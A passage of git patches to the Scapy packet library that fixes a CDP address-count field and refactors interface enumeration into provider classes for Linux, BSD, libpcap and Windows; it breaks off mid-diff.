target: auto + threshold: 0.5% + base: auto patch: false changes: false From 96e0094d51b16ccc0392dc6a71490356ad395b3f Mon Sep 17 00:00:00 2001 From: CQ Date: Thu, 24 Sep 2020 01:36:52 +0800 Subject: [PATCH 0283/1632] fix naddr field of CDPMsgAddr (#2829) --- scapy/contrib/cdp.py | 2 +- test/contrib/cdp.uts | 8 ++++++++ 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/cdp.py b/scapy/contrib/cdp.py index 208cdd161fc..54ad71faaee 100644 --- a/scapy/contrib/cdp.py +++ b/scapy/contrib/cdp.py @@ -189,7 +189,7 @@ class CDPMsgAddr(CDPMsgGeneric): name = "Addresses" fields_desc = [XShortEnumField("type", 0x0002, _cdp_tlv_types), ShortField("len", None), - FieldLenField("naddr", None, "addr", "!I"), + FieldLenField("naddr", None, fmt="!I", count_of="addr"), PacketListField("addr", [], _CDPGuessAddrRecord, length_from=lambda x:x.len - 8)] diff --git a/test/contrib/cdp.uts b/test/contrib/cdp.uts index d4e3dacd41a..7bc5aec4714 100644 --- a/test/contrib/cdp.uts +++ b/test/contrib/cdp.uts @@ -81,3 +81,11 @@ assert CDPMsgPortID in p and CDPMsgIPPrefix in p pkt = CDPv2_HDR(vers=2, ttl=180, msg='123') assert len(pkt) == 7 + += CDPv2 - CDPMsgAddr Packet +cdp_msg_addr = CDPMsgAddr(addr=[CDPAddrRecordIPv4(), CDPAddrRecordIPv6()]) +assert(cdp_msg_addr.haslayer(CDPAddrRecordIPv4)) +assert(cdp_msg_addr.haslayer(CDPAddrRecordIPv6)) +assert(len(cdp_msg_addr.addr) == 2) + +assert raw(cdp_msg_addr)[4:8] == b'\x00\x00\x00\x02' From 4521d8ab496027a08c3086e700827c5b7d77e195 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Thu, 24 Sep 2020 18:39:36 +0200 Subject: [PATCH 0284/1632] Implement global & extensible interfaces (#2707) * Implement global & extensible interfaces * Simplify detection of valid interfaces * Linux: handle interfaces with no IPv4 * Reimplement get_working_ifaces * Remove 'main' IPv6 in interfaces * Don't show invalid interfaces by default * Update error message --- .config/ci/install.sh | 6 +- .config/codespell_ignore.txt | 1 + .travis.yml | 2 +- doc/scapy/routing.rst | 12 + doc/scapy/usage.rst | 2 +- run_scapy.bat | 4 +- scapy/all.py | 1 + scapy/arch/__init__.py | 21 +- scapy/arch/bpf/core.py | 186 ++++++----- scapy/arch/bpf/supersocket.py | 6 +- scapy/arch/common.py | 40 ++- scapy/arch/{pcapdnet.py => libpcap.py} | 133 ++++++-- scapy/arch/linux.py | 76 +++-- scapy/arch/solaris.py | 2 +- scapy/arch/windows/__init__.py | 412 ++++++++----------------- scapy/arch/windows/native.py | 3 +- scapy/compat.py | 8 + scapy/config.py | 53 ++-- scapy/fields.py | 6 +- scapy/interfaces.py | 362 ++++++++++++++++++++++ scapy/layers/usb.py | 44 ++- scapy/libs/winpcapy.py | 42 ++- scapy/route.py | 33 +- scapy/route6.py | 12 +- scapy/sendrecv.py | 87 ++++-- scapy/supersocket.py | 11 +- scapy/themes.py | 8 +- scapy/tools/UTscapy.py | 4 +- scapy/utils.py | 37 ++- scapy/utils6.py | 2 +- test/bpf.uts | 37 --- test/linux.uts | 12 +- test/regression.uts | 111 +++++-- test/windows.uts | 26 +- tox.ini | 2 +- 35 files changed, 1155 insertions(+), 649 deletions(-) rename scapy/arch/{pcapdnet.py => libpcap.py} (79%) create mode 100644 scapy/interfaces.py diff --git a/.config/ci/install.sh b/.config/ci/install.sh index e28bbc0908d..251b1cf0d8d 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -2,10 +2,10 @@ # Install on osx if [ "$OSTYPE" = "darwin"* ] || [ "$TRAVIS_OS_NAME" = "osx" ] then - if [ ! -z $SCAPY_USE_PCAPDNET ] + if [ ! -z $SCAPY_USE_LIBPCAP ] then brew update - brew install libdnet libpcap + brew install libpcap fi fi @@ -18,7 +18,7 @@ then fi # Make sure libpcap is installed -if [ ! -z $SCAPY_USE_PCAPDNET ] +if [ ! -z $SCAPY_USE_LIBPCAP ] then sudo apt-get -qy install libpcap-dev || exit 1 fi diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index 1aaaa05c76c..7c7202d32ad 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -12,6 +12,7 @@ fo gost iff inout +microsof mitre nd negociate diff --git a/.travis.yml b/.travis.yml index dd12c00a93c..52c0ef4b9f6 100644 --- a/.travis.yml +++ b/.travis.yml @@ -58,7 +58,7 @@ jobs: - os: linux python: 3.8 env: - - SCAPY_USE_PCAPDNET=yes TOXENV=py38-linux_root,codecov + - SCAPY_USE_LIBPCAP=yes TOXENV=py38-linux_root,codecov # warnings/deprecations - os: linux diff --git a/doc/scapy/routing.rst b/doc/scapy/routing.rst index 8e468696daa..a426d9fd93d 100644 --- a/doc/scapy/routing.rst +++ b/doc/scapy/routing.rst @@ -20,6 +20,18 @@ Use ``get_if_list()`` to get the interface list >>> get_if_list() ['lo', 'eth0'] +You can also use the :py:attr:`conf.ifaces ` object to get interfaces. +In this example, the object is first displayed as as column. Then, the :py:attr:`dev_from_index() ` is used to access the interface at index 2. + +.. code-block:: pycon + + >>> conf.ifaces + SRC INDEX IFACE IPv4 IPv6 MAC + sys 2 eth0 10.0.0.5 fe80::10a:2bef:dc12:afae Microsof:12:cb:ef + sys 1 lo 127.0.0.1 ::1 00:00:00:00:00:00 + >>> conf.ifaces.dev_from_index(2) + + IPv4 routes ----------- diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index f7ac1e952ee..af4c7de674e 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1214,7 +1214,7 @@ Provided that your wireless card and driver are correctly configured for frame i On Windows, if using Npcap, the equivalent would be to call:: - >>> # Of course, conf.iface can be replaced by any interfaces accessed through IFACES + >>> # Of course, conf.iface can be replaced by any interfaces accessed through conf.ifaces ... conf.iface.setmonitor(True) you can have a kind of FakeAP:: diff --git a/run_scapy.bat b/run_scapy.bat index cfaa30ad643..11c73621a8d 100644 --- a/run_scapy.bat +++ b/run_scapy.bat @@ -2,10 +2,10 @@ set PYTHONPATH=%~dp0 REM shift will not work with %* set "_args=%*" -IF "%1" == "--2" ( +IF "%1" == "-2" ( set PYTHON=python set "_args=%_args:~3%" -) ELSE IF "%1" == "--3" ( +) ELSE IF "%1" == "-3" ( set PYTHON=python3 set "_args=%_args:~3%" ) diff --git a/scapy/all.py b/scapy/all.py index 4f438461402..b07be8af034 100644 --- a/scapy/all.py +++ b/scapy/all.py @@ -14,6 +14,7 @@ from scapy.error import * from scapy.themes import * from scapy.arch import * +from scapy.interfaces import * from scapy.plist import * from scapy.fields import * diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index eab1ae9a22b..154767d9c74 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -18,20 +18,23 @@ from scapy.compat import orb +# Duplicated from scapy/utils.py for import reasons + def str2mac(s): return ("%02x:" * 6)[:-1] % tuple(orb(x) for x in s) -if not WINDOWS: - if not conf.use_pcap: - from scapy.arch.bpf.core import get_if_raw_addr - - def get_if_addr(iff): - return inet_ntop(socket.AF_INET, get_if_raw_addr(iff)) + """ + Returns the IPv4 of an interface or "0.0.0.0" if not available + """ + return inet_ntop(socket.AF_INET, get_if_raw_addr(iff)) # noqa: F405 def get_if_hwaddr(iff): + """ + Returns the MAC (hardware) address of an interface + """ addrfamily, mac = get_if_raw_hwaddr(iff) # noqa: F405 if addrfamily in [ARPHDR_ETHER, ARPHDR_LOOPBACK]: return str2mac(mac) @@ -51,6 +54,8 @@ def get_if_hwaddr(iff): # def get_if(iff,cmd): # def get_if_index(iff): +from scapy.interfaces import get_working_if # noqa F401 + if LINUX: from scapy.arch.linux import * # noqa F403 elif BSD: @@ -58,7 +63,7 @@ def get_if_hwaddr(iff): from scapy.arch.bpf.core import * # noqa F403 if not conf.use_pcap: # Native - from scapy.arch.bpf.supersocket import * # noqa F403 + from scapy.arch.bpf.supersocket import * # noqa F403 conf.use_bpf = True elif SOLARIS: from scapy.arch.solaris import * # noqa F403 @@ -66,8 +71,6 @@ def get_if_hwaddr(iff): from scapy.arch.windows import * # noqa F403 from scapy.arch.windows.native import * # noqa F403 -if conf.iface is None: - conf.iface = conf.loopback_name _set_conf_sockets() # Apply config diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index 0ebdb53162b..6fbdf447eef 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -7,7 +7,7 @@ from __future__ import absolute_import from ctypes import cdll, cast, pointer -from ctypes import c_int, c_ulong, c_char_p +from ctypes import c_int, c_ulong, c_uint, c_char_p, Structure, POINTER from ctypes.util import find_library import fcntl import os @@ -16,27 +16,53 @@ import struct import subprocess +import scapy from scapy.arch.bpf.consts import BIOCSETF, SIOCGIFFLAGS, BIOCSETIF -from scapy.arch.common import get_if, compile_filter +from scapy.arch.common import get_if, compile_filter, _iff_flags +from scapy.arch.unix import in6_getifaddr from scapy.compat import plain_str from scapy.config import conf from scapy.data import ARPHDR_LOOPBACK, ARPHDR_ETHER from scapy.error import Scapy_Exception, warning +from scapy.interfaces import InterfaceProvider, IFACES, NetworkInterface, \ + network_name +from scapy.pton_ntop import inet_ntop from scapy.modules.six.moves import range # ctypes definitions LIBC = cdll.LoadLibrary(find_library("libc")) + LIBC.ioctl.argtypes = [c_int, c_ulong, c_char_p] LIBC.ioctl.restype = c_int +# The following is implemented as of Python >= 3.3 +# under socket.*. Remember to use them when dropping Py2.7 + +# See https://docs.python.org/3/library/socket.html#socket.if_nameindex + + +class if_nameindex(Structure): + _fields_ = [("if_index", c_uint), + ("if_name", c_char_p)] + + +_ptr_ifnameindex_table = POINTER(if_nameindex * 255) + +LIBC.if_nameindex.argtypes = [] +LIBC.if_nameindex.restype = _ptr_ifnameindex_table +LIBC.if_freenameindex.argtypes = [_ptr_ifnameindex_table] +LIBC.if_freenameindex.restype = None # Addresses manipulation functions + def get_if_raw_addr(ifname): """Returns the IPv4 address configured on 'ifname', packed with inet_pton.""" # noqa: E501 + ifname = network_name(ifname) + # Get ifconfig output subproc = subprocess.Popen( [conf.prog.ifconfig, ifname], @@ -49,7 +75,7 @@ def get_if_raw_addr(ifname): # Get IPv4 addresses addresses = [ - line for line in plain_str(stdout).splitlines() + line.strip() for line in plain_str(stdout).splitlines() if "inet " in line ] @@ -69,6 +95,7 @@ def get_if_raw_hwaddr(ifname): NULL_MAC_ADDRESS = b'\x00' * 6 + ifname = network_name(ifname) # Handle the loopback interface separately if ifname == conf.loopback_name: return (ARPHDR_LOOPBACK, NULL_MAC_ADDRESS) @@ -85,7 +112,7 @@ def get_if_raw_hwaddr(ifname): # Get MAC addresses addresses = [ - line for line in plain_str(stdout).splitlines() if ( + line.strip() for line in plain_str(stdout).splitlines() if ( "ether" in line or "lladdr" in line or "address" in line ) ] @@ -108,7 +135,12 @@ def get_dev_bpf(): try: fd = os.open("/dev/bpf%i" % bpf, os.O_RDWR) return (fd, bpf) - except OSError: + except OSError as ex: + if ex.errno == 13: # Permission denied + raise Scapy_Exception(( + "Permission denied: could not open /dev/bpf%i. " + "Make sure to be running Scapy as root ! (sudo)" + ) % bpf) continue raise Scapy_Exception("No /dev/bpf handle is available !") @@ -125,87 +157,87 @@ def attach_filter(fd, bpf_filter, iface): # Interface manipulation functions -def get_if_list(): - """Returns a list containing all network interfaces.""" - - # Get ifconfig output - subproc = subprocess.Popen( - [conf.prog.ifconfig], - close_fds=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE - ) - stdout, stderr = subproc.communicate() - if subproc.returncode: - raise Scapy_Exception("Failed to execute ifconfig: (%s)" % - (plain_str(stderr))) - - interfaces = [ - line[:line.find(':')] for line in plain_str(stdout).splitlines() - if ": flags" in line.lower() - ] - return interfaces +def _get_ifindex_list(): + """ + Returns a list containing (iface, index) + """ + ptr = LIBC.if_nameindex() + ifaces = [] + for i in range(255): + iface = ptr.contents[i] + if not iface.if_name: + break + ifaces.append((plain_str(iface.if_name), iface.if_index)) + LIBC.if_freenameindex(ptr) + return ifaces _IFNUM = re.compile(r"([0-9]*)([ab]?)$") -def get_working_ifaces(): - """ - Returns an ordered list of interfaces that could be used with BPF. - Note: the order mimics pcap_findalldevs() behavior - """ +def _get_if_flags(ifname): + """Internal function to get interface flags""" + # Get interface flags + try: + result = get_if(ifname, SIOCGIFFLAGS) + except IOError: + warning("ioctl(SIOCGIFFLAGS) failed on %s !", ifname) + return None - # Only root is allowed to perform the following ioctl() call - if os.getuid() != 0: - return [] + # Convert flags + ifflags = struct.unpack("16xH14x", result)[0] + return ifflags - # Test all network interfaces - interfaces = [] - for ifname in get_if_list(): - # Unlike pcap_findalldevs(), we do not care of loopback interfaces. - if ifname == conf.loopback_name: - continue +class BPFInterfaceProvider(InterfaceProvider): + name = "BPF" - # Get interface flags + def _is_valid(self, dev): + if not dev.flags & 0x1: # not IFF_UP + return False + # Get a BPF handle try: - result = get_if(ifname, SIOCGIFFLAGS) - except IOError: - warning("ioctl(SIOCGIFFLAGS) failed on %s !", ifname) - continue - - # Convert flags - ifflags = struct.unpack("16xH14x", result)[0] - if ifflags & 0x1: # IFF_UP - - # Get a BPF handle fd = get_dev_bpf()[0] - if fd is None: - raise Scapy_Exception("No /dev/bpf are available !") - - # Check if the interface can be used + except Scapy_Exception: + return True # Can't check if available (non sudo?) + if fd is None: + raise Scapy_Exception("No /dev/bpf are available !") + # Check if the interface can be used + try: + fcntl.ioctl(fd, BIOCSETIF, struct.pack("16s16x", + dev.network_name.encode())) + except IOError: + return False + else: + return True + finally: + # Close the file descriptor + os.close(fd) + + def load(self): + from scapy.fields import FlagValue + data = {} + ips = in6_getifaddr() + for ifname, index in _get_ifindex_list(): try: - fcntl.ioctl(fd, BIOCSETIF, struct.pack("16s16x", - ifname.encode())) - except IOError: - pass - else: - ifnum, ifab = _IFNUM.search(ifname).groups() - interfaces.append((ifname, int(ifnum) if ifnum else -1, ifab)) - finally: - # Close the file descriptor - os.close(fd) - - # Sort to mimic pcap_findalldevs() order - interfaces.sort(key=lambda elt: (elt[1], elt[2], elt[0])) - - return [iface[0] for iface in interfaces] - - -def get_working_if(): - """Returns the first interface than can be used with BPF""" - - ifaces = get_working_ifaces() - if not ifaces: - # A better interface will be selected later using the routing table - return conf.loopback_name - return ifaces[0] + ifflags = _get_if_flags(ifname) + mac = scapy.utils.str2mac(get_if_raw_hwaddr(ifname)[1]) + ip = inet_ntop(socket.AF_INET, get_if_raw_addr(ifname)) + except Scapy_Exception: + continue + ifflags = FlagValue(ifflags, _iff_flags) + if_data = { + "name": ifname, + "network_name": ifname, + "description": ifname, + "flags": ifflags, + "index": index, + "ip": ip, + "ips": [x[0] for x in ips if x[2] == ifname] + [ip], + "mac": mac + } + data[ifname] = NetworkInterface(self, if_data) + return data + + +IFACES.register_provider(BPFInterfaceProvider) diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 4087899bb12..f1837c9d1bc 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -21,6 +21,7 @@ from scapy.consts import FREEBSD, NETBSD, DARWIN from scapy.data import ETH_P_ALL from scapy.error import Scapy_Exception, warning +from scapy.interfaces import network_name from scapy.supersocket import SuperSocket from scapy.compat import raw @@ -53,10 +54,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, else: self.promisc = promisc - if iface is None: - self.iface = conf.iface - else: - self.iface = iface + self.iface = network_name(iface or conf.iface) # Get the BPF handle (self.ins, self.dev_bpf) = get_dev_bpf() diff --git a/scapy/arch/common.py b/scapy/arch/common.py index 375a1f1bd25..d44d43d156d 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -16,16 +16,42 @@ from scapy.config import conf from scapy.data import MTU, ARPHRD_TO_DLT from scapy.error import Scapy_Exception +from scapy.interfaces import network_name if not WINDOWS: from fcntl import ioctl +# From if.h +_iff_flags = [ + "UP", + "BROADCAST", + "DEBUG", + "LOOPBACK", + "POINTTOPOINT", + "NOTRAILERS", + "RUNNING", + "NOARP", + "PROMISC", + "NOTRAILERS", + "ALLMULTI", + "MASTER", + "SLAVE", + "MULTICAST", + "PORTSEL", + "AUTOMEDIA", + "DYNAMIC", + "LOWER_UP", + "DORMANT", + "ECHO" +] + # UTILS def get_if(iff, cmd): """Ease SIOCGIF* ioctl calls""" + iff = network_name(iff) sck = socket.socket() try: return ioctl(sck, cmd, struct.pack("16s16x", iff.encode("utf8"))) @@ -33,7 +59,7 @@ def get_if(iff, cmd): sck.close() -def get_if_raw_hwaddr(iff): +def get_if_raw_hwaddr(iff, siocgifhwaddr=None): """Get the raw MAC address of a local interface. This function uses SIOCGIFHWADDR calls, therefore only works @@ -42,8 +68,10 @@ def get_if_raw_hwaddr(iff): :param iff: the network interface name as a string :returns: the corresponding raw MAC address """ - from scapy.arch import SIOCGIFHWADDR - return struct.unpack("16xh6s8x", get_if(iff, SIOCGIFHWADDR)) + if siocgifhwaddr is None: + from scapy.arch import SIOCGIFHWADDR + siocgifhwaddr = SIOCGIFHWADDR + return struct.unpack("16xh6s8x", get_if(iff, siocgifhwaddr)) # SOCKET UTILS @@ -96,10 +124,7 @@ def compile_filter(filter_exp, iface=None, linktype=None, raise Scapy_Exception( "Please provide an interface or linktype!" ) - if WINDOWS: - iface = conf.iface.pcap_name - else: - iface = conf.iface + iface = conf.iface # Try to guess linktype to avoid requiring root try: arphd = get_if_raw_hwaddr(iface)[0] @@ -113,6 +138,7 @@ def compile_filter(filter_exp, iface=None, linktype=None, ) elif iface: err = create_string_buffer(PCAP_ERRBUF_SIZE) + iface = network_name(iface) iface = create_string_buffer(iface.encode("utf8")) pcap = pcap_open_live( iface, MTU, promisc, 0, err diff --git a/scapy/arch/pcapdnet.py b/scapy/arch/libpcap.py similarity index 79% rename from scapy/arch/pcapdnet.py rename to scapy/arch/libpcap.py index 4211d6f2247..8030309eede 100644 --- a/scapy/arch/pcapdnet.py +++ b/scapy/arch/libpcap.py @@ -19,14 +19,22 @@ from scapy.config import conf from scapy.consts import WINDOWS from scapy.data import MTU, ETH_P_ALL +from scapy.error import Scapy_Exception, log_loading, warning +from scapy.interfaces import network_name, InterfaceProvider, NetworkInterface from scapy.pton_ntop import inet_ntop from scapy.supersocket import SuperSocket -from scapy.error import Scapy_Exception, log_loading, warning +from scapy.utils import str2mac + import scapy.consts if not scapy.consts.WINDOWS: from fcntl import ioctl +# AF_LINK is only available and provided on BSD (MAC) +# but because we use its value elsewhere, let's patch it. +if not hasattr(socket, "AF_LINK"): + socket.AF_LINK = 18 + ############ # COMMON # ############ @@ -35,8 +43,20 @@ # BIOCIMMEDIATE = 0x80044270 BIOCIMMEDIATE = -2147204496 +# https://github.com/the-tcpdump-group/libpcap/blob/master/pcap/pcap.h +PCAP_IF_UP = 0x00000002 # interface is up +_pcap_if_flags = [ + "LOOPBACK", + "UP", + "RUNNING", + "WIRELESS", + "OK", + "DISCONNECTED", + "NA" +] + -class _L2pcapdnetSocket(SuperSocket, SelectableObject): +class _L2libpcapSocket(SuperSocket, SelectableObject): nonblocking_socket = True def __init__(self): @@ -94,22 +114,35 @@ def select(sockets, remain=None): # Part of the Winpcapy integration was inspired by phaethon/scapy # but he destroyed the commit history, so there is no link to that try: - from scapy.libs.winpcapy import PCAP_ERRBUF_SIZE, pcap_if_t, \ - sockaddr_in, sockaddr_in6, pcap_findalldevs, pcap_freealldevs, \ - pcap_lib_version, pcap_close, \ - pcap_open_live, pcap_pkthdr, \ - pcap_next_ex, pcap_datalink, \ - pcap_compile, pcap_setfilter, pcap_setnonblock, pcap_sendpacket, \ - bpf_program + from scapy.libs.winpcapy import ( + PCAP_ERRBUF_SIZE, + bpf_program, + pcap_close, + pcap_compile, + pcap_datalink, + pcap_findalldevs, + pcap_freealldevs, + pcap_if_t, + pcap_lib_version, + pcap_next_ex, + pcap_open_live, + pcap_pkthdr, + pcap_sendpacket, + pcap_setfilter, + pcap_setnonblock, + sockaddr_in, + sockaddr_in6, + ) def load_winpcapy(): """This functions calls libpcap ``pcap_findalldevs`` function, and extracts and parse all the data scapy will need to build the Interface List. - The date will be stored in ``conf.cache_iflist``, or accessible - with ``get_if_list()`` + The data will be stored in ``conf.cache_pcapiflist`` """ + from scapy.fields import FlagValue + err = create_string_buffer(PCAP_ERRBUF_SIZE) devs = POINTER(pcap_if_t)() if_list = {} @@ -120,9 +153,12 @@ def load_winpcapy(): # Iterate through the different interfaces while p: name = plain_str(p.contents.name) # GUID - description = plain_str(p.contents.description) # NAME + description = plain_str( + p.contents.description or "" + ) # DESC flags = p.contents.flags # FLAGS ips = [] + mac = "" a = p.contents.addresses while a: # IPv4 address @@ -134,18 +170,26 @@ def load_winpcapy(): elif family == socket.AF_INET6: val = cast(ap, POINTER(sockaddr_in6)) val = val.contents.sin6_addr[:] + elif family == socket.AF_LINK: + # Special case: MAC + # (AF_LINK is mostly BSD specific) + val = ap.contents.sa_data + val = val[:6] + mac = str2mac(bytes(bytearray(val))) + a = a.contents.next + continue else: - # Unknown address family - # (AF_LINK isn't a thing on Windows) + # Unknown AF a = a.contents.next continue addr = inet_ntop(family, bytes(bytearray(val))) if addr != "0.0.0.0": ips.append(addr) a = a.contents.next - if_list[name] = (description, ips, flags) + flags = FlagValue(flags, _pcap_if_flags) + if_list[name] = (description, ips, flags, mac) p = p.contents.next - conf.cache_iflist = if_list + conf.cache_pcapiflist = if_list except Exception: raise finally: @@ -180,16 +224,11 @@ def load_winpcapy(): conf.loopback_name = conf.loopback_name = "Npcap Loopback Adapter" # noqa: E501 if conf.use_pcap: - def get_if_list(): - """Returns all pcap names""" - if not conf.cache_iflist: - load_winpcapy() - return list(conf.cache_iflist) - class _PcapWrapper_libpcap: # noqa: F811 """Wrapper for the libpcap calls""" def __init__(self, device, snaplen, promisc, to_ms, monitor=None): + device = network_name(device) self.errbuf = create_string_buffer(PCAP_ERRBUF_SIZE) self.iface = create_string_buffer(device.encode("utf8")) self.dtl = None @@ -277,9 +316,54 @@ def close(self): pcap_close(self.pcap) open_pcap = _PcapWrapper_libpcap + class LibpcapProvider(InterfaceProvider): + """ + Load interfaces from Libpcap on non-Windows machines + """ + name = "libpcap" + libpcap = True + + def load(self): + if not conf.use_pcap or WINDOWS: + return {} + if not conf.cache_pcapiflist: + load_winpcapy() + data = {} + i = 0 + for ifname, dat in conf.cache_pcapiflist.items(): + description, ips, flags, mac = dat + i += 1 + if not mac: + from scapy.arch import get_if_hwaddr + try: + mac = get_if_hwaddr(ifname) + except Exception: + # There are at least 3 different possible exceptions + continue + if_data = { + 'name': ifname, + 'description': description or ifname, + 'network_name': ifname, + 'index': i, + 'mac': mac or '00:00:00:00:00:00', + 'ips': ips, + 'flags': flags + } + data[ifname] = NetworkInterface(self, if_data) + return data + + def reload(self): + if conf.use_pcap: + from scapy.arch.libpcap import load_winpcapy + load_winpcapy() + return self.load() + + if not WINDOWS: + conf.ifaces.register_provider(LibpcapProvider) + # pcap sockets - class L2pcapListenSocket(_L2pcapdnetSocket): + class L2pcapListenSocket(_L2libpcapSocket): desc = "read packets at layer 2 using libpcap" def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, monitor=None): # noqa: E501 @@ -316,7 +400,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, monito def send(self, x): raise Scapy_Exception("Can't send anything with L2pcapListenSocket") # noqa: E501 - class L2pcapSocket(_L2pcapdnetSocket): + class L2pcapSocket(_L2libpcapSocket): desc = "read/write packets at layer 2 using only libpcap" def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, nofilter=0, # noqa: E501 @@ -389,6 +473,5 @@ def send(self, x): self.outs.send(sx) else: # No libpcap installed - get_if_list = lambda: [] if WINDOWS: NPCAP_PATH = "" diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 642e3ebd7fb..53744cdc3c2 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -28,10 +28,13 @@ from scapy.config import conf from scapy.data import MTU, ETH_P_ALL, SOL_PACKET, SO_ATTACH_FILTER, \ SO_TIMESTAMPNS +from scapy.interfaces import IFACES, InterfaceProvider, NetworkInterface, \ + network_name from scapy.supersocket import SuperSocket +from scapy.pton_ntop import inet_ntop from scapy.error import warning, Scapy_Exception, \ ScapyInvalidPlatformException, log_runtime -from scapy.arch.common import get_if, compile_filter +from scapy.arch.common import get_if, compile_filter, _iff_flags import scapy.modules.six as six from scapy.modules.six.moves import range @@ -92,13 +95,20 @@ def get_if_raw_addr(iff): + r""" + Return the raw IPv4 address of an interface. + If unavailable, returns b"\0\0\0\0" + """ try: return get_if(iff, SIOCGIFADDR)[20:24] except IOError: return b"\0\0\0\0" -def get_if_list(): +def _get_if_list(): + """ + Function to read the interfaces from /proc/net/dev + """ try: f = open("/proc/net/dev", "rb") except IOError: @@ -118,19 +128,6 @@ def get_if_list(): return lst -def get_working_if(): - """ - Return the name of the first network interfcace that is up. - """ - for i in get_if_list(): - if i == conf.loopback_name: - continue - ifflags = struct.unpack("16xH14x", get_if(i, SIOCGIFFLAGS))[0] - if ifflags & IFF_UP: - return i - return conf.loopback_name - - def attach_filter(sock, bpf_filter, iface): """ Compile bpf filter and attach it to a socket @@ -256,15 +253,12 @@ def read_routes(): gw_str = scapy.utils.inet_ntoa(struct.pack("I", int(gw, 16))) metric = int(metric) + route = [dst_int, msk_int, gw_str, iff, ifaddr, metric] if ifaddr_int & msk_int != dst_int: tmp_route = get_alias_address(iff, dst_int, gw_str, metric) if tmp_route: - routes.append(tmp_route) - else: - routes.append((dst_int, msk_int, gw_str, iff, ifaddr, metric)) - - else: - routes.append((dst_int, msk_int, gw_str, iff, ifaddr, metric)) + route = tmp_route + routes.append(tuple(route)) f.close() s.close() @@ -360,6 +354,42 @@ def get_if_index(iff): return int(struct.unpack("I", get_if(iff, SIOCGIFINDEX)[16:20])[0]) +class LinuxInterfaceProvider(InterfaceProvider): + name = "sys" + + def _is_valid(self, dev): + return bool(dev.flags & IFF_UP) + + def load(self): + from scapy.fields import FlagValue + data = {} + ips = in6_getifaddr() + for i in _get_if_list(): + ifflags = struct.unpack("16xH14x", get_if(i, SIOCGIFFLAGS))[0] + index = get_if_index(i) + mac = scapy.utils.str2mac( + get_if_raw_hwaddr(i, siocgifhwaddr=SIOCGIFHWADDR)[1] + ) + ip = inet_ntop(socket.AF_INET, get_if_raw_addr(i)) + if ip == "0.0.0.0": + ip = None + ifflags = FlagValue(ifflags, _iff_flags) + if_data = { + "name": i, + "network_name": i, + "description": i, + "flags": ifflags, + "index": index, + "ip": ip, + "ips": [x[0] for x in ips if x[2] == i] + [ip] if ip else [], + "mac": mac + } + data[i] = NetworkInterface(self, if_data) + return data + + +IFACES.register_provider(LinuxInterfaceProvider) + if os.uname()[4] in ['x86_64', 'aarch64']: def get_last_packet_timestamp(sock): ts = ioctl(sock, SIOCGSTAMP, "1234567890123456") @@ -388,7 +418,7 @@ class L2Socket(SuperSocket): def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, nofilter=0, monitor=None): - self.iface = conf.iface if iface is None else iface + self.iface = network_name(iface or conf.iface) self.type = type self.promisc = conf.sniff_promisc if promisc is None else promisc if monitor is not None: @@ -586,7 +616,9 @@ def down(self): def __enter__(self): self.setup() self.up() + conf.ifaces.reload() return self def __exit__(self, exc_type, exc_val, exc_tb): self.destroy() + conf.ifaces.reload() diff --git a/scapy/arch/solaris.py b/scapy/arch/solaris.py index 6083af4f9b1..44817039704 100644 --- a/scapy/arch/solaris.py +++ b/scapy/arch/solaris.py @@ -18,7 +18,7 @@ # From sys/sockio.h and net/if.h SIOCGIFHWADDR = 0xc02069b9 # Get hardware address -from scapy.arch.pcapdnet import * # noqa: F401, F403, E402 +from scapy.arch.libpcap import * # noqa: F401, F403, E402 from scapy.arch.unix import * # noqa: F401, F403, E402 from scapy.arch.common import get_if_raw_hwaddr # noqa: F401, F403, E402 diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 614bd9ecf22..f9f73c1e3b4 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -16,6 +16,7 @@ import subprocess as sp from glob import glob import struct +import warnings from scapy.arch.windows.structures import _windows_title, \ GetAdaptersAddresses, GetIpForwardTable, GetIpForwardTable2, \ @@ -23,22 +24,27 @@ from scapy.consts import WINDOWS, WINDOWS_XP from scapy.config import conf, ConfClass from scapy.error import Scapy_Exception, log_loading, log_runtime, warning +from scapy.interfaces import NetworkInterface, InterfaceProvider, \ + dev_from_index, resolve_iface, network_name from scapy.pton_ntop import inet_ntop, inet_pton -from scapy.utils import atol, itom, pretty_list, mac2str, str2mac +from scapy.utils import atol, itom, mac2str, str2mac from scapy.utils6 import construct_source_candidate_set, in6_getscope from scapy.data import ARPHDR_ETHER, load_manuf import scapy.modules.six as six -from scapy.modules.six.moves import input, winreg, UserDict +from scapy.modules.six.moves import input, winreg from scapy.compat import plain_str from scapy.supersocket import SuperSocket conf.use_pcap = True # These import must appear after setting conf.use_* variables -from scapy.arch import pcapdnet # noqa: E402 -from scapy.arch.pcapdnet import NPCAP_PATH, get_if_list # noqa: E402 +from scapy.arch import libpcap # noqa: E402 +from scapy.arch.libpcap import ( # noqa: E402 + NPCAP_PATH, + PCAP_IF_UP, +) -# Detection happens after pcapdnet import (NPcap detection) +# Detection happens after libpcap import (NPcap detection) NPCAP_LOOPBACK_NAME = r"\Device\NPF_Loopback" if conf.use_npcap: 